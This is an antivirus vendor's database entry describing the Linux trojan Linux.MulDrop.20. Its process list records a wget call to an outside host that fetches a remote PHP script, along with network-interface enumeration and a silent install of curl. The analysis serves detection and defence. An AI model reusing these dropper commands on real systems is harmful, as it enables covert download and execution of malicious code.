Linux.MulDrop.20

Linux.MulDrop.20

Added to the Dr.Web virus database: 2017-11-12

Virus description added: 2017-11-12

Malicious functions:

Launches itself as a daemon

Performs process tracing:

Launches processes:

/bin/bash <SAMPLE_FULL_PATH> -c exec '<SAMPLE_FULL_PATH>' \"$@\" <SAMPLE_FULL_PATH>
<SAMPLE_FULL_PATH>
/bin/bash <SAMPLE_FULL_PATH> -c
wget http://sbts-script.com//rectussc/dosyalar/sinusbotverison.php -q -O -
ip addr
tail -n1
grep state UP -A2
cut -f1 -d/
awk {print $2}
wget /rectussc/dosyalar/sbguncelle.php -q -O -
grep -c ok installed
dpkg-query -W -f=${Status} curl
apt-get -y install curl
/usr/bin/dpkg --print-foreign-architectures
/usr/lib/apt/methods/http
/usr/bin/dpkg --assert-multi-arch
/bin/sh -c /usr/bin/apt-listchanges --apt || test $? -ne 10
/usr/bin/apt-listchanges --apt
/bin/sh -c /usr/sbin/dpkg-preconfigure --apt || true
/usr/sbin/dpkg-preconfigure --apt
locale charmap
sh -c stty -a 2>/dev/null
stty -a
/usr/bin/dpkg --status-fd 17 --unpack --auto-deconfigure /var/cache/apt/archives/libcurl3_7.38.0-4+deb8u5_amd64.deb /var/cache/apt/archives/curl_7.38.0-4+deb8u5_amd64.deb

Kills the following processes:

Performs operations with the file system:

Modifies file access rights:

Creates or modifies files:

Locks files:

Network activity:

Establishes connection:

HTTP GET requests:

DNS ASK:

Other:

Collects CPU information

Collects RAM information